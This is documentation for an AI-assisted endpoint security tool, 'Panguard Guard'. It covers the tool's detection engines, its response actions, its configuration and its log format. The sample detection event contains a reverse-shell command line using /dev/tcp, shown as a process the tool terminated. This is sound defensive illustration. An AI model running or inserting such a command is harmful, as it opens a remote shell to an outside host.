Panguard Guard
Real-time endpoint protection powered by a 5-agent AI pipeline. Guard monitors processes, network traffic, and file system changes 24/7 using Sigma, YARA, and ATR rule engines backed by a three-layer AI analysis funnel.
Quick Start
panguard guard start
panguard guard status
panguard guard stop
By default, Guard starts in monitor mode. It logs threats but does not take automated action until you switch to protect mode.
5-Agent Pipeline
Every event flows through five specialised agents in sequence. Each agent enriches the event context before passing it to the next.
| Agent | Role | Description |
|---|---|---|
| Detect | Rule matching | Runs Sigma, YARA, and ATR rules against incoming telemetry. Produces raw alerts with severity and confidence scores. |
| Analyze | AI triage | Escalates ambiguous alerts through the three-layer AI funnel. Adjusts confidence scores and adds contextual reasoning. |
| Respond | Action execution | Selects and executes response actions based on confidence thresholds: auto-act, confirm, or notify. |
| Report | Structured logging | Writes JSONL event records, generates daily summaries, and pushes notifications to configured channels. |
| Chat | Interactive query | Natural-language interface for investigating past events, tuning rules, and asking follow-up questions about alerts. |
Detection Engines
Guard ships with three rule engines. All rules are updated automatically via the Panguard rule feed.
| Engine | Rules | Scope |
|---|---|---|
| Sigma | 3,760 | Generic log-based detection. Covers process creation, network connections, registry changes, and system events. |
| YARA | 5,961 | Binary and file pattern matching. Detects malware families, packers, exploit kits, and suspicious file structures. |
| ATR | 69 | AI Agent Threat Rules. Purpose-built for prompt injection, tool poisoning, MCP server abuse, and credential exfiltration by autonomous agents. |
Three-Layer AI Funnel
Not every alert needs cloud-scale AI. The funnel resolves the vast majority of events locally, keeping latency low and costs predictable.
Layer 1: Rules
Sigma, YARA, and ATR engines resolve clear-cut matches. No AI involved.
Layer 2: Local AI (Ollama)
Ambiguous alerts are analysed by a local LLM running on-device via Ollama. No data leaves the machine.
Layer 3: Cloud AI
Complex, multi-signal events are escalated to cloud AI for deep reasoning and cross-tenant intelligence.
Response Actions
Guard supports six response actions. In protect mode, the Respond agent selects actions automatically based on confidence thresholds.
| Action | Description |
|---|---|
| block_ip | Add source IP to firewall deny list (iptables / pf). |
| kill_process | Terminate the offending process tree immediately. |
| quarantine_file | Move file to quarantine directory and strip execute permissions. |
| alert | Send notification via configured channels (Slack, email, webhook). |
| snapshot | Capture full process state, environment, and open file handles for forensics. |
| escalate | Forward event to SOC / human analyst for manual triage. |
Confidence Thresholds
Configuration
View and modify Guard configuration interactively:
panguard guard config
Key Options
| Option | Values | Default | Description |
|---|---|---|---|
| mode | monitor | protect | monitor | Monitor logs only, or actively respond to threats. |
| auto_response | true | false | false | Enable automated response actions in protect mode. |
| notification.slack | webhook URL | (none) | Slack incoming webhook for alert delivery. |
| notification.email | address | (none) | Email address for critical alert notifications. |
| notification.webhook | URL | (none) | Generic webhook endpoint for all events. |
| ai.local_model | model name | llama3.2:3b | Ollama model used for Layer 2 analysis. |
| ai.cloud_enabled | true | false | true | Allow Layer 3 cloud AI escalation. |
panguard guard config set mode protect panguard guard config set auto_response true
panguard guard config set notification.slack https://hooks.slack.com/services/T.../B.../xxx
Monitoring and Logs
Guard writes structured event logs in JSONL format. Each line is a self-contained JSON object with timestamp, severity, rule ID, and action taken.
~/.panguard-guard/events.jsonl
Verbose Output
Use the --verbose flag to stream events to stdout in real time:
panguard guard start --verbose
Event Callback Format
Each event record follows this structure:
{
"timestamp": "2026-03-08T14:32:01.442Z",
"severity": "high",
"rule_id": "sigma:proc_creation_suspicious_shell",
"engine": "sigma",
"layer": 1,
"confidence": 0.94,
"action": "kill_process",
"action_status": "executed",
"process": {
"pid": 48291,
"name": "bash",
"cmdline": "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
},
"host": "prod-web-03"
}System Service
Install Guard as a system service so it starts automatically on boot. On Linux this creates a systemd unit; on macOS it creates a launchd plist.
panguard guard install
panguard guard uninstall
Both commands require root / administrator privileges. Guard will prompt for elevation if not already running as root.
Telemetry
Guard collects anonymous usage telemetry to improve rule quality and false-positive rates. No file contents, process arguments, or personally identifiable information is ever transmitted.
panguard guard start --no-telemetry
panguard guard --show-upload-data
Full details on data collection and retention are available in PRIVACY.md.
Platform Notes
| Feature | Linux | macOS | Windows |
|---|---|---|---|
| Core Guard daemon | Yes | Yes | Yes |
| Sigma / YARA / ATR | Yes | Yes | Yes |
| Falco (eBPF kernel events) | Yes | No | No |
| Suricata DPI (deep packet inspection) | Yes | No | No |
| systemd service | Yes | -- | -- |
| launchd service | -- | Yes | -- |
For Falco and Suricata setup instructions, see the Advanced Setup Guide.
Start Protecting
Install Panguard and activate Guard in under a minute. Community plan includes full scan and Layer 1 rule-based protection at no cost.
panguard guard start